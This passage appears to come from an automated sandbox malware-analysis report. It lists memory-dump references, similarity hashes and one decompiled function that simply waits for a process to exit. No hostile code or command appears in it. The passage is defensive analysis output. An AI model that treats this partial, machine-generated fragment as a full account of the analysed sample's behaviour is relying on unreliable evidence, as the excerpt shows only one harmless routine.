                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Enum$CloseOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1701607978-0
                                                                                                                                                            • Opcode ID: 59d682d2769c7ffa8c72f02591651c1d8de3acbb8d02d9656d0fa725ad70eb9a
                                                                                                                                                            • Instruction ID: 9dac54037c2c609fae9d8da341fbee91e842dc5ed3fcac5841e2016b86418a3b
                                                                                                                                                            • Opcode Fuzzy Hash: 59d682d2769c7ffa8c72f02591651c1d8de3acbb8d02d9656d0fa725ad70eb9a
                                                                                                                                                            • Instruction Fuzzy Hash: 68418D36D08209BAEB21DFE4DC45FAEB7BDEF84310F200529E511A2190E7309A509B62
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 009C4917, Relevance: 6.0, APIs: 4, Instructions: 28sleepCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C4917(void* __ecx, long _a4) {
				long _v8;
				void* _t6;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t6 = OpenProcess(0x400, 0, _a4);
				_t13 = _t6;
				if(_t13 != 0) {
					do {
						GetExitCodeProcess(_t13,  &_v8);
						Sleep(0x3e8);
					} while (_v8 == 0x103);
					CloseHandle(_t13);
					_t6 = 1;
				}
				return _t6;
			}






                                                                                                                                                            0x009c491b
                                                                                                                                                            0x009c492a
                                                                                                                                                            0x009c4930
                                                                                                                                                            0x009c4934
                                                                                                                                                            0x009c4936
                                                                                                                                                            0x009c493b
                                                                                                                                                            0x009c4946
                                                                                                                                                            0x009c494c
                                                                                                                                                            0x009c4956
                                                                                                                                                            0x009c495e
                                                                                                                                                            0x009c495e
                                                                                                                                                            0x009c4963

                                                                                                                                                            APIs
                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,009C5B93,?,?,?,009C5B93), ref: 009C492A
                                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 009C493B
                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,009C5B93), ref: 009C4946
                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,009C5B93), ref: 009C4956
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp Download File
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp Download File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CloseCodeExitHandleOpenSleep
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 126888380-0
                                                                                                                                                            • Opcode ID: 7ee5c67a7f0b70ae6dbf50ef9961eecaa67078466365192d936847baa390ac75
                                                                                                                                                            • Instruction ID: 7a42f6893e9c13b48a547a5b46efce2d9ea0c40bfb73c38ddeffdc213ea18cb0
                                                                                                                                                            • Opcode Fuzzy Hash: 7ee5c67a7f0b70ae6dbf50ef9961eecaa67078466365192d936847baa390ac75
                                                                                                                                                            • Instruction Fuzzy Hash: 81E0ED32D66228FBD3219B94DC09FDE7BACEB06762F100150FA04A2080C7708F41AAA9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%